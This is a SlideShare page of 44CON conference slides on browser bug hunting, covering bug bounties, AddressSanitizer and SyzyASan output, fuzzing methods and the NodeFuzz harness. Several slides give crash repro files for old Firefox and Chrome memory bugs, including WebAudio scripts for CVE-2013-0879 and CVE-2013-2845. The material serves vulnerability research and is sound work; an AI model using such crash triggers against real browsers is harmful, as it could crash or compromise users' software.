SlideShare a Scribd company logo

44 con slides

G
geeksec80

This document provides an overview of browser bug hunting from the perspective of Atte Kettunen, a security researcher who has found over 100 vulnerabilities and received over 60 rewards. It discusses three golden rules for staying productive: 1) Stay up-to-date on new features, competition from other researchers, and emerging tools; 2) Details techniques like fuzzing, instrumentation, and debugging tools; 3) Notes the importance of hardware resources for running large numbers of tests in parallel.

Technology
1 of 51
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
Browser Bug Hunting Memoirs of a last man standing Atte Kettunen (@attekett) OUSPG https://code.google.com/p/ouspg/
Picture by @dominic_sim
Started at OUSPG in summer 2011 First security bug from Chrome 2011-12 Since then ~100 Vulns ~60 Rewards 39 CVEs Atte Kettunen
Mozilla since 2004 - Sec-High/Critical $3,000 Google since 2010 - Typical security bugs $1,000-$3,133.7 - Possibility for bonus rewards ● PoC, exploit, awesomeness (Microsoft 2013 June 25 - July 25) Browser Bug Bounty Programs
Easy to get started - Lots of bugs o/ Helpful vendor security teams and supportive responses to first bug submissions Supportive (secretive/competitive) community of other bounty hunters Browser Bug Bounty Programs
● Use-after-free ○ DOM ○ CSS ○ Rendering ● Buffer-overflow ○ Media formats ○ Parsers ○ Decoders ○ Coordinates Where the bugs are
AddressSanitizer - global-buffer-overflow - READ of size 2 #0 nsCharTraits<unsigned short>::length() #1 nsAString_internal::Assign() . Repro-file: <link rel="stylesheet" href="data:text/css;charset=utf-16, p#two%1%7Bbackground-color%65535A%3B%7D% 0D%0A"/> Some bug - CVE-2012-4185 - Firefox
AddressSanitizer - heap-use-after-free - READ of size 2 #0 WebCore::nextBreakablePosition() #1 ...::RenderBlock::LineBreaker::nextLineBreak() . Repro-file: <html><body> <ruby> <q style="column-gap:2;">a </ruby> <cite style="word-break: break-all;">a <q style="text-transform:uppercase;">a <sup style="text-overflow:ellipsis;"> </body></html> Some bug - Regression - Chrome
==3213== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f50cd6ffcf8 at pc 0x7f50dd159dde bp 0x7fff3e0accd0 sp 0x7fff3e0accc8 READ of size 2 at 0x7f50cd6ffcf8 thread T0 #0 0x7f.de in WebCore::CSSParser::lex(void*) ???:0 #1 0x7f.78 in cssyyparse(void*) ???:0 #2 0x7f.40 in WebCore::CSSParser::parseDeclaration() . Repro-file: <a style=top:-1px> Some bug - Regression - Chrome
Three golden rules: Hunting for living
Three golden rules: 1. Stay green Hunting for living
Three golden rules: 1. Stay green - Features Hunting for living
Three golden rules: 1. Stay green - Features 2. Stay green - Competition Hunting for living
Three golden rules: 1. Stay green - Features 2. Stay green - Competition 3. Stay green - Tools Hunting for living
1. Stay green - Features ● New features are published all the time ○ New code o/ ● Some changes are not highlighted ○ Minor updates to JavaScript API support etc. ● Old bugs fixed ○ New code o/ ● Old features can change ○ Prefixes disappear(-webkit,-moz), ○ Features can get disabled Hunting for living
1. Stay Green - Features ● Firefox Aurora - Release note: "Partial support for Web Audio, targeted at web developers for testing" (May 17, 2013) Hunting for living
2. Stay green - Competition ● Tools ○ Different approach -> Different bugs? ● Targets ○ Find new minefields ● Platforms ○ Different code on different platforms Hunting for living
2. Stay green - Competition @cevans: "@j00ru has melted polar ice with his PDF fuzzing on 9k cores." Hunting for living
3. Stay green - Tools ● Instrumentations ○ New instrumentation -> detect new issues ● Build environments ○ Broken builds @#!¤#... ● Fuzzers ○ New techniques Hunting for living
3. Stay green - Tools <Q>: WTF??? On Chromium startup: ==25254== ERROR: AddressSanitizer: global-buffer-overflow on address 0x000011d3dde5 at pc 0x5ab21a bp 0x7fff00659450 sp 0x7fff00659428 READ of size 10 at 0x000011d3dde5 thread T0 #0 0x5ab219 in __interceptor_memcmp _asan_rtl_ #1 0xa1edc08 in fillInUnixFile .../sqlite/amalgamation/sqlite3.c:28654 #2 0xa1efe7c in unixOpen .../sqlite/amalgamation/sqlite3.c:29294 <A>: Diff of /trunk/tools/build/scripts/slave/runtest.py: + # Avoid aggressive memcmp checks until http://crbug.com/178677 is fixed. + os.environ['ASAN_OPTIONS'] = 'strict_memcmp=0' Hunting for living
● Instrumentation ● Fuzzers ● Hardware/Infrastructure Tools
● Clang compiler plugin ● Adds instrumentation to check memory access at runtime ● Similar to Valgrind ● Only 2x slowdown ● Created at Google ● Used by Google & Mozilla ● Linux & OS X ● http://www.chromium.org/developers/testing/addresssanitizer AddressSanitizer
● Awesome with use-after-frees ● Very good for buffer-overflows and out of bounds access ● Good but confused with type confusions AddressSanitizer
==6==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000268d0 at pc 0x7f845771029f bp 0x7fff...2a0 sp 0x7fffc7eea298 READ of size 8 at 0x6070000268d0 thread T0 (chrome) #0 0x7f845771029e (... /asan-linux-release-209136/chrome+0x96f229e) #1 0x7f84576aacea (... /asan-linux-release-209136/chrome+0x968ccea) #2 0x7f8451ce00f3 (... /asan-linux-release-209136/chrome+0x3cc20f3) . 0x6070000268d0 is located 64 bytes inside of 72-byte region [0x607000026890,0x6070000268d8) freed by thread T19 (AudioOutputDevi) here: #0 0x7f844f58e101 (... /asan-linux-release-209136/chrome+0x1570101) #1 0x7f845887b5ec (... /asan-linux-release-209136/chrome+0xa85d5ec) . AddressSanitizer
==6==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000268d0 at pc 0x7f845771029f bp 0x7fff...2a0 sp 0x7fffc7eea298 READ of size 8 at 0x6070000268d0 thread T0 (chrome) #0 0x7f845771029e in WebCore::WaveShaperDSPKernel:: lazyInitializeOversampling(...) .../WebKit/Source/wtf/OwnPtr.h:138 #1 0x7.a in WebCore::WaveShaperProcessor::setOversample(...) ... /WebKit/Source/modules/webaudio/WaveShaperProcessor.cpp:70 . 0x6070000268d0 is located 64 bytes inside of 72-byte region [0x607000026890,0x6070000268d8) freed by thread T19 (AudioOutputDevi) here: #0 0x7.1 in operator delete(void*) _asan_rtl_ #1 0x7.c in WebCore::AudioDSPKernelProcessor::uninitialize() src/third_party/WebKit/Source/wtf/OwnPtrCommon.h:47 . AddressSanitizer
● Used to instrument binaries ● Redirects heap-related calls to own run- time library ● Currently only heap-instrumentation ● Chrome/Chromium only atm. ● About 3x Slowdown ● Windows only ● https://code.google.com/p/sawbuck/wiki/SyzyASanDesignDocument SyzyASan
SyzyASAN error: heap-buffer-overflow on address 0x0379D1A7 (stack_id=0x44CB69D7) READ of size 8 at 0x0379D000 #0 0x000068ef23be in (unknown) #1 0x000068f387f4 in (unknown) #2 0x000068eeb486 in (unknown) #3 0x000068e8add7 in (unknown) . . . SyzyASan
Bad access information: +0x000 alloc_stack : [62] 0x0f999970 Void +0x0f8 alloc_stack_size : 0x3c '<' +0x0fc alloc_tid : 0x14a8 +0x100 free_stack : [62] (null) +0x1f8 free_stack_size : 0 '' +0x1fc free_tid : 0 +0x200 error_type : 3 ( HEAP_BUFFER_OVERFLOW ) +0x204 access_mode : 0 ( ASAN_READ_ACCESS ) +0x208 access_size : 8 +0x20c shadow_info : [128] "06499E3F is 23 bytes beyond 384-byte block [06499CA8,06499E28)." +0x290 microseconds_since_free : 0 SyzyASan
Crash stack: chrome_dll!SkOpSegment::addTCoincident+0x18e chrome_dll!SkOpContour::calcCoincidentWinding+0x9f chrome_dll!CoincidenceCheck+0x3c chrome_dll!Op+0x26a . Allocation stack: asan_rtl!asan_HeapAlloc+0x48 chrome_dll!malloc+0x17 chrome_dll!realloc+0x15 chrome_dll!SkOpSegment::addT+0x9b chrome_dll!AddIntersectTs+0xceb chrome_dll!Op+0x244 SyzyASan
● Heap allocation monitoring for Windows ● No feedback - Only crash :( ● “Works” on Chrome/Chromium ● env: CHROME_ALLOCATOR="winheap" ● Enable Chrome error reporting -> minidumps ● Firewall Chrome( No free 0-days for Google ;) ) ● Debugging tools x86 Page-Heap
ExceptionAddress: 564a0cd7 (chrome_..!WebCore:: WaveShaperDSPKernel::lazyInitializeOversampling+0x0...06) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 27261fe4 Attempt to read from address 27261fe4 . STACK_TEXT: chrome_...!WebCore::WaveShaperDSPKernel:: lazyInitializeOversampling+0x6 [... webkitsourcemoduleswebaudiowaveshaperdspkernel.cpp @ 53] chrome_...!WebCore::WaveShaperProcessor::setOversample+0x29 . APPLICATION_FAULT_INVALID_POINTER_READ_chrome!WebCore:: WaveShaperDSPKernel::lazyInitializeOversampling+6 Dump-analysis
● Dumb fuzzing ○ Yes, still works ○ Yes, you can still find bugs with bit-flipping of image-files ● Smart fuzzing ○ Finds bugs fast but runs out of bugs faster. :( Fuzzers
Dumb fuzzing ● Radamsa || Surku o/ ○ https://code.google.com/p/ouspg/ ● Mutate old repros ( find ./src/ -type d -name *crashtest* | xargs ls; ) ● Collect winnings Fuzzers
Smart fuzzing ● W3C/MDN(/MSDN) ● Again stay green ● Most of the JavaScript APIs in browsers are really similar ● Some of the public tools have the logic in them already ● W3C spec + grep + sed = $$$ Fuzzers
Smart fuzzing WebAudio API - PannerNode - Specification interface PannerNode : AudioNode { void setPosition(double x, double y, double z); void setOrientation(double x, double y, double z); void setVelocity(double x, double y, double z); attribute double refDistance; attribute double maxDistance; attribute double rolloffFactor; }; Fuzzers
Smart fuzzing 2D Canvas API - Specification // rects void clearRect(unrestricted double x, unrestricted double y, unrestricted double w, unrestricted double h); void fillRect(unrestricted double x, unrestricted double y, unrestricted double w, unrestricted double h); // shadows attribute unrestricted double shadowOffsetX; // (default 0) attribute unrestricted double shadowOffsetY; // (default 0) attribute unrestricted double shadowBlur; // (default 0) Fuzzers
Individuals: ● Physical machines -> sysadmining <3 ● SSD <3 ● RAM++ ● Vicious cycle of Bug->Bounty->New HW->Bug->Bounty... Hardware/Infrastructure
8x Dual Core CPU, 2GB ram, USB-stick, aka. Badgers OUSPG - 2011
University HW: Badgers 6x Quad core AMD A10, 16GB ram, SSD 6x Dual Dual Core AMD antique, 8GB, 10k rpm BYOD: 4x Quad core i7-3770K, 16GB ram, SSD And additional 30+ cores misc hardware with 133.7+ GB of ram and bunch of SSDs OUSPG - 2013
OUSPG - 2013
44 con slides
ClusterFuzz aka. CF ● Google fuzzing cluster ● 2012 - ○ 6000 Chrome instances ○ 50m+ test cases per day ○ Plans for quadrupling at that time ● ASAN, multiple fuzzers, minimization, regression ranges, verify fixes, dupes & dupes & dupes... Hardware/Infrastructure
“cluster-fuzz is a soulless bug hunting machine. It has no want or need for your gratitude. It lives only to feed on bugs.” ClusterFuzz
● 12 machines running 24/7 ● ~50 cores, ~133.7GB of RAM ● approx. 20m test cases per day ● 19 file-formats ● git, scp, auto-update, auto-minimize ● Radamsa and ... My stuff
● Browser fuzzer harness ● Written in JavaScript ( Node.js ) ● Linux, Windows, OS X ● Test case generators and instrumentations loaded as modules ● Uses WebSockets for test case injection to browser ● Stable - https://code.google.com/p/ouspg/downloads/list ● Trunkish - https://github.com/attekett/NodeFuzz NodeFuzz
Requirements: Google Chrome installed $ sudo apt-get install nodejs $ git clone https://github.com/attekett/NodeFuzz.git $ cd NodeFuzz $ npm install $ vim config.js #Optional $ node nodefuzz.js NodeFuzz - Setup - Ubuntu
● Fairly new JS API (Chrome 2011, FF 2013) ● "The API has been designed to allow modular routing.(UAF) Basic audio operations are performed by audio nodes that are linked together to form an audio routing graphs.(UAF/BOF) Inside a same context, several sources are supported, with different kind of channel layout.(UAF/BOF) This modular design allows for great flexibility and for the creation of complex audio functions and of dynamic effects. (BOF)" - MDN NodeFuzz - module - WebAudio
Bugs found: ● Chrome - 4 UAF, 3 BOF ● Firefox - 1 UAF, 8 BOF NodeFuzz - module - WebAudio
CVE-2013-0879 - Chrome - BOF <script> try{var context= new webkitAudioContext()}catch(e){} try{var oscillator= context.createOscillator()}catch(e){} try{oscillator.start(0.701,0.7,0.7)}catch(e){} setInterval(function(){ try{oscillator.connect(context.destination);}catch(e){} },4) try{oscillator.stop(0.70)}catch(e){} </script> NodeFuzz - module - WebAudio
CVE-2013-2845 - Chrome - UAF <script> var Context0= new webkitAudioContext() var Analyser0=Context0.createAnalyser(); var WaveShaper0=Context0.createWaveShaper(); var Convolver3=Context0.createConvolver(); Analyser0.connect(WaveShaper0); WaveShaper0.connect(Context0.destination); Convolver3.connect(Analyser0); setInterval(function(){ Analyser0.disconnect(); },4) </script> NodeFuzz - module - WebAudio
DEMO!!! && Q&A

More Related Content

What's hot (20)

PDF
コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜
Retrieva inc.
 
PDF
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
Area41
 
PDF
DEF CON 27 - workshop - GUILLAUME ROSS - defending environments and hunting m...
Felipe Prado
 
PPTX
Scratch pcduino
Jingfeng Liu
 
PDF
[Ruxcon 2011] Post Memory Corruption Memory Analysis
Moabi.com
 
PDF
Build your own private blockchain based on ethereum
Mehran Pourvahab
 
PPTX
Countering Innovative Sandbox Evasion Techniques Used by Malware
Tyler Borosavage
 
PDF
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NoSuchCon
 
ODP
[Defcon] Hardware backdooring is practical
Moabi.com
 
PDF
syzbot and the tale of million kernel bugs
Dmitry Vyukov
 
ODP
Hardware backdooring is practical : slides
Moabi.com
 
PDF
Digging for Android Kernel Bugs
Jiahong Fang
 
PPTX
[Defcon24] Introduction to the Witchcraft Compiler Collection
Moabi.com
 
PDF
A (Mis-) Guided Tour of the Web Audio API
Edward B. Rockower
 
PPTX
Cisco IOS shellcode: All-in-one
DefconRussia
 
PDF
Debugging linux kernel tools and techniques
Satpal Parmar
 
PDF
Gnu linux on arm for $50 - $100
Dobrica Pavlinušić
 
PDF
iCloud keychain
Alexey Troshichev
 
PDF
Kernel Recipes 2019 - GNU poke, an extensible editor for structured binary data
Anne Nicolas
 
PDF
Device tree
Rouyun Pan
 
コンテナ仮想、その裏側 〜user namespaceとrootlessコンテナ〜
Retrieva inc.
 
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
Area41
 
DEF CON 27 - workshop - GUILLAUME ROSS - defending environments and hunting m...
Felipe Prado
 
Scratch pcduino
Jingfeng Liu
 
[Ruxcon 2011] Post Memory Corruption Memory Analysis
Moabi.com
 
Build your own private blockchain based on ethereum
Mehran Pourvahab
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Tyler Borosavage
 
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NoSuchCon
 
[Defcon] Hardware backdooring is practical
Moabi.com
 
syzbot and the tale of million kernel bugs
Dmitry Vyukov
 
Hardware backdooring is practical : slides
Moabi.com
 
Digging for Android Kernel Bugs
Jiahong Fang
 
[Defcon24] Introduction to the Witchcraft Compiler Collection
Moabi.com
 
A (Mis-) Guided Tour of the Web Audio API
Edward B. Rockower
 
Cisco IOS shellcode: All-in-one
DefconRussia
 
Debugging linux kernel tools and techniques
Satpal Parmar
 
Gnu linux on arm for $50 - $100
Dobrica Pavlinušić
 
iCloud keychain
Alexey Troshichev
 
Kernel Recipes 2019 - GNU poke, an extensible editor for structured binary data
Anne Nicolas
 
Device tree
Rouyun Pan
 

Viewers also liked (19)

PDF
44 con slides (1)
geeksec80
 
PDF
Deep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_level
geeksec80
 
DOC
Rpc调试通用
geeksec80
 
PDF
12058 woot13-kholia
geeksec80
 
PDF
Bh us 11_tsai_pan_weapons_targeted_attack_wp
geeksec80
 
PPTX
Bai - 3 chuong 1- tin 10
camtuyet Tran
 
PPTX
Taint scope
geeksec80
 
PDF
Https interception proxies
geeksec80
 
PDF
2012 04-16-ultrasurf-analysis (2)
geeksec80
 
PPTX
Chude06 nhom06
camtuyet Tran
 
PDF
Fuzz nt
geeksec80
 
PDF
Automated antlr tree walker
geeksec80
 
PDF
From Scrappy to Scale: Crafting Early-Stage Communities for Culture and Growth
Emily Castor
 
PDF
Python arsenal for re (1)
geeksec80
 
PDF
529 owasp top 10 2013 - rc1[1]
geeksec80
 
PDF
Python arsenal for re
geeksec80
 
PDF
Introduction to ida python
geeksec80
 
PDF
Lyft in a New Era of Technology-Enabled Mobility: Implications for Policy and...
Emily Castor
 
PDF
02 banking trojans-thomassiebert
geeksec80
 
44 con slides (1)
geeksec80
 
Deep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_level
geeksec80
 
Rpc调试通用
geeksec80
 
12058 woot13-kholia
geeksec80
 
Bh us 11_tsai_pan_weapons_targeted_attack_wp
geeksec80
 
Bai - 3 chuong 1- tin 10
camtuyet Tran
 
Taint scope
geeksec80
 
Https interception proxies
geeksec80
 
2012 04-16-ultrasurf-analysis (2)
geeksec80
 
Chude06 nhom06
camtuyet Tran
 
Fuzz nt
geeksec80
 
Automated antlr tree walker
geeksec80
 
From Scrappy to Scale: Crafting Early-Stage Communities for Culture and Growth
Emily Castor
 
Python arsenal for re (1)
geeksec80
 
529 owasp top 10 2013 - rc1[1]
geeksec80
 
Python arsenal for re
geeksec80
 
Introduction to ida python
geeksec80
 
Lyft in a New Era of Technology-Enabled Mobility: Implications for Policy and...
Emily Castor
 
02 banking trojans-thomassiebert
geeksec80
 
Ad

Similar to 44 con slides (20)

PDF
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON
 
PDF
Kettunen, miaubiz fuzzing at scale and in style
DefconRussia
 
PDF
Why kernelspace sucks?
OpenFest team
 
PDF
Programar para GPUs
Alcides Fonseca
 
PDF
Molecular Shape Searching on GPUs: A Brave New World
Can Ozdoruk
 
PDF
mloc.js 2014 - JavaScript and the browser as a platform for game development
David Galeano
 
PDF
Why use JavaScript in Hardware? GoTo Conf - Berlin
TechnicalMachine
 
PDF
NSC #2 - Challenge Solution
NoSuchCon
 
PDF
A million ways to provision embedded linux devices
Mender.io
 
PDF
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Ron Munitz
 
PDF
Introduction to Docker (as presented at December 2013 Global Hackathon)
Jérôme Petazzoni
 
PPTX
C# Production Debugging Made Easy
Alon Fliess
 
PDF
Building Android for the Cloud: Android as a Server (Mobile World Congress 2014)
Ron Munitz
 
PDF
Building android for the Cloud: Android as a Server (AnDevConBoston 2014)
Ron Munitz
 
PPTX
Exploring the Internet of Things Using Ruby
Mike Hagedorn
 
PDF
Rainbow Over the Windows: More Colors Than You Could Expect
Peter Hlavaty
 
PDF
Node azure
Emanuele DelBono
 
PDF
DevOpSec_DockerNPodMan-20230220.pdf
kanedafromparis
 
PDF
Electron
ITCP Community
 
PDF
Docker Introduction + what is new in 0.9
Jérôme Petazzoni
 
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON
 
Kettunen, miaubiz fuzzing at scale and in style
DefconRussia
 
Why kernelspace sucks?
OpenFest team
 
Programar para GPUs
Alcides Fonseca
 
Molecular Shape Searching on GPUs: A Brave New World
Can Ozdoruk
 
mloc.js 2014 - JavaScript and the browser as a platform for game development
David Galeano
 
Why use JavaScript in Hardware? GoTo Conf - Berlin
TechnicalMachine
 
NSC #2 - Challenge Solution
NoSuchCon
 
A million ways to provision embedded linux devices
Mender.io
 
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Ron Munitz
 
Introduction to Docker (as presented at December 2013 Global Hackathon)
Jérôme Petazzoni
 
C# Production Debugging Made Easy
Alon Fliess
 
Building Android for the Cloud: Android as a Server (Mobile World Congress 2014)
Ron Munitz
 
Building android for the Cloud: Android as a Server (AnDevConBoston 2014)
Ron Munitz
 
Exploring the Internet of Things Using Ruby
Mike Hagedorn
 
Rainbow Over the Windows: More Colors Than You Could Expect
Peter Hlavaty
 
Node azure
Emanuele DelBono
 
DevOpSec_DockerNPodMan-20230220.pdf
kanedafromparis
 
Electron
ITCP Community
 
Docker Introduction + what is new in 0.9
Jérôme Petazzoni
 
Ad

Recently uploaded (20)

PDF
Peak of Data & AI Encore - Real-Time Insights & Scalable Editing with ArcGIS
Safe Software
 
PDF
AI Unleashed - Shaping the Future -Starting Today - AIOUG Yatra 2025 - For Co...
Sandesh Rao
 
PDF
Per Axbom: The spectacular lies of maps
Nexer Digital
 
PDF
The Future of Mobile Is Context-Aware—Are You Ready?
iProgrammer Solutions Private Limited
 
PPTX
Agile Chennai 18-19 July 2025 | Workshop - Enhancing Agile Collaboration with...
AgileNetwork
 
PDF
State-Dependent Conformal Perception Bounds for Neuro-Symbolic Verification
Ivan Ruchkin
 
PDF
Make GenAI investments go further with the Dell AI Factory
Principled Technologies
 
PPTX
The Future of AI & Machine Learning.pptx
pritsen4700
 
PDF
Generative AI vs Predictive AI-The Ultimate Comparison Guide
Lily Clark
 
PPTX
Farrell_Programming Logic and Design slides_10e_ch02_PowerPoint.pptx
bashnahara11
 
PPTX
Dev Dives: Automate, test, and deploy in one place—with Unified Developer Exp...
AndreeaTom
 
PDF
NewMind AI Weekly Chronicles – July’25, Week III
NewMind AI
 
PDF
The Future of Artificial Intelligence (AI)
Mukul
 
PDF
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
PPTX
AI in Daily Life: How Artificial Intelligence Helps Us Every Day
vanshrpatil7
 
PDF
Tea4chat - another LLM Project by Kerem Atam
a0m0rajab1
 
PPTX
Agile Chennai 18-19 July 2025 | Emerging patterns in Agentic AI by Bharani Su...
AgileNetwork
 
PDF
Build with AI and GDG Cloud Bydgoszcz- ADK .pdf
jaroslawgajewski1
 
PPTX
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
Priyanka Aash
 
PDF
How ETL Control Logic Keeps Your Pipelines Safe and Reliable.pdf
Stryv Solutions Pvt. Ltd.
 
Peak of Data & AI Encore - Real-Time Insights & Scalable Editing with ArcGIS
Safe Software
 
AI Unleashed - Shaping the Future -Starting Today - AIOUG Yatra 2025 - For Co...
Sandesh Rao
 
Per Axbom: The spectacular lies of maps
Nexer Digital
 
The Future of Mobile Is Context-Aware—Are You Ready?
iProgrammer Solutions Private Limited
 
Agile Chennai 18-19 July 2025 | Workshop - Enhancing Agile Collaboration with...
AgileNetwork
 
State-Dependent Conformal Perception Bounds for Neuro-Symbolic Verification
Ivan Ruchkin
 
Make GenAI investments go further with the Dell AI Factory
Principled Technologies
 
The Future of AI & Machine Learning.pptx
pritsen4700
 
Generative AI vs Predictive AI-The Ultimate Comparison Guide
Lily Clark
 
Farrell_Programming Logic and Design slides_10e_ch02_PowerPoint.pptx
bashnahara11
 
Dev Dives: Automate, test, and deploy in one place—with Unified Developer Exp...
AndreeaTom
 
NewMind AI Weekly Chronicles – July’25, Week III
NewMind AI
 
The Future of Artificial Intelligence (AI)
Mukul
 
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
AI in Daily Life: How Artificial Intelligence Helps Us Every Day
vanshrpatil7
 
Tea4chat - another LLM Project by Kerem Atam
a0m0rajab1
 
Agile Chennai 18-19 July 2025 | Emerging patterns in Agentic AI by Bharani Su...
AgileNetwork
 
Build with AI and GDG Cloud Bydgoszcz- ADK .pdf
jaroslawgajewski1
 
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
Priyanka Aash
 
How ETL Control Logic Keeps Your Pipelines Safe and Reliable.pdf
Stryv Solutions Pvt. Ltd.
 

44 con slides

  • 1. Browser Bug Hunting Memoirs of a last man standing Atte Kettunen (@attekett) OUSPG https://code.google.com/p/ouspg/
  • 3. Started at OUSPG in summer 2011 First security bug from Chrome 2011-12 Since then ~100 Vulns ~60 Rewards 39 CVEs Atte Kettunen
  • 4. Mozilla since 2004 - Sec-High/Critical $3,000 Google since 2010 - Typical security bugs $1,000-$3,133.7 - Possibility for bonus rewards ● PoC, exploit, awesomeness (Microsoft 2013 June 25 - July 25) Browser Bug Bounty Programs
  • 5. Easy to get started - Lots of bugs o/ Helpful vendor security teams and supportive responses to first bug submissions Supportive (secretive/competitive) community of other bounty hunters Browser Bug Bounty Programs
  • 6. ● Use-after-free ○ DOM ○ CSS ○ Rendering ● Buffer-overflow ○ Media formats ○ Parsers ○ Decoders ○ Coordinates Where the bugs are
  • 7. AddressSanitizer - global-buffer-overflow - READ of size 2 #0 nsCharTraits<unsigned short>::length() #1 nsAString_internal::Assign() . Repro-file: <link rel="stylesheet" href="data:text/css;charset=utf-16, p#two%1%7Bbackground-color%65535A%3B%7D% 0D%0A"/> Some bug - CVE-2012-4185 - Firefox
  • 8. AddressSanitizer - heap-use-after-free - READ of size 2 #0 WebCore::nextBreakablePosition() #1 ...::RenderBlock::LineBreaker::nextLineBreak() . Repro-file: <html><body> <ruby> <q style="column-gap:2;">a </ruby> <cite style="word-break: break-all;">a <q style="text-transform:uppercase;">a <sup style="text-overflow:ellipsis;"> </body></html> Some bug - Regression - Chrome
  • 9. ==3213== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f50cd6ffcf8 at pc 0x7f50dd159dde bp 0x7fff3e0accd0 sp 0x7fff3e0accc8 READ of size 2 at 0x7f50cd6ffcf8 thread T0 #0 0x7f.de in WebCore::CSSParser::lex(void*) ???:0 #1 0x7f.78 in cssyyparse(void*) ???:0 #2 0x7f.40 in WebCore::CSSParser::parseDeclaration() . Repro-file: <a style=top:-1px> Some bug - Regression - Chrome
  • 11. Three golden rules: 1. Stay green Hunting for living
  • 12. Three golden rules: 1. Stay green - Features Hunting for living
  • 13. Three golden rules: 1. Stay green - Features 2. Stay green - Competition Hunting for living
  • 14. Three golden rules: 1. Stay green - Features 2. Stay green - Competition 3. Stay green - Tools Hunting for living
  • 15. 1. Stay green - Features ● New features are published all the time ○ New code o/ ● Some changes are not highlighted ○ Minor updates to JavaScript API support etc. ● Old bugs fixed ○ New code o/ ● Old features can change ○ Prefixes disappear(-webkit,-moz), ○ Features can get disabled Hunting for living
  • 16. 1. Stay Green - Features ● Firefox Aurora - Release note: "Partial support for Web Audio, targeted at web developers for testing" (May 17, 2013) Hunting for living
  • 17. 2. Stay green - Competition ● Tools ○ Different approach -> Different bugs? ● Targets ○ Find new minefields ● Platforms ○ Different code on different platforms Hunting for living
  • 18. 2. Stay green - Competition @cevans: "@j00ru has melted polar ice with his PDF fuzzing on 9k cores." Hunting for living
  • 19. 3. Stay green - Tools ● Instrumentations ○ New instrumentation -> detect new issues ● Build environments ○ Broken builds @#!¤#... ● Fuzzers ○ New techniques Hunting for living
  • 20. 3. Stay green - Tools <Q>: WTF??? On Chromium startup: ==25254== ERROR: AddressSanitizer: global-buffer-overflow on address 0x000011d3dde5 at pc 0x5ab21a bp 0x7fff00659450 sp 0x7fff00659428 READ of size 10 at 0x000011d3dde5 thread T0 #0 0x5ab219 in __interceptor_memcmp _asan_rtl_ #1 0xa1edc08 in fillInUnixFile .../sqlite/amalgamation/sqlite3.c:28654 #2 0xa1efe7c in unixOpen .../sqlite/amalgamation/sqlite3.c:29294 <A>: Diff of /trunk/tools/build/scripts/slave/runtest.py: + # Avoid aggressive memcmp checks until http://crbug.com/178677 is fixed. + os.environ['ASAN_OPTIONS'] = 'strict_memcmp=0' Hunting for living
  • 21. ● Instrumentation ● Fuzzers ● Hardware/Infrastructure Tools
  • 22. ● Clang compiler plugin ● Adds instrumentation to check memory access at runtime ● Similar to Valgrind ● Only 2x slowdown ● Created at Google ● Used by Google & Mozilla ● Linux & OS X ● http://www.chromium.org/developers/testing/addresssanitizer AddressSanitizer
  • 23. ● Awesome with use-after-frees ● Very good for buffer-overflows and out of bounds access ● Good but confused with type confusions AddressSanitizer
  • 24. ==6==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000268d0 at pc 0x7f845771029f bp 0x7fff...2a0 sp 0x7fffc7eea298 READ of size 8 at 0x6070000268d0 thread T0 (chrome) #0 0x7f845771029e (... /asan-linux-release-209136/chrome+0x96f229e) #1 0x7f84576aacea (... /asan-linux-release-209136/chrome+0x968ccea) #2 0x7f8451ce00f3 (... /asan-linux-release-209136/chrome+0x3cc20f3) . 0x6070000268d0 is located 64 bytes inside of 72-byte region [0x607000026890,0x6070000268d8) freed by thread T19 (AudioOutputDevi) here: #0 0x7f844f58e101 (... /asan-linux-release-209136/chrome+0x1570101) #1 0x7f845887b5ec (... /asan-linux-release-209136/chrome+0xa85d5ec) . AddressSanitizer
  • 25. ==6==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000268d0 at pc 0x7f845771029f bp 0x7fff...2a0 sp 0x7fffc7eea298 READ of size 8 at 0x6070000268d0 thread T0 (chrome) #0 0x7f845771029e in WebCore::WaveShaperDSPKernel:: lazyInitializeOversampling(...) .../WebKit/Source/wtf/OwnPtr.h:138 #1 0x7.a in WebCore::WaveShaperProcessor::setOversample(...) ... /WebKit/Source/modules/webaudio/WaveShaperProcessor.cpp:70 . 0x6070000268d0 is located 64 bytes inside of 72-byte region [0x607000026890,0x6070000268d8) freed by thread T19 (AudioOutputDevi) here: #0 0x7.1 in operator delete(void*) _asan_rtl_ #1 0x7.c in WebCore::AudioDSPKernelProcessor::uninitialize() src/third_party/WebKit/Source/wtf/OwnPtrCommon.h:47 . AddressSanitizer
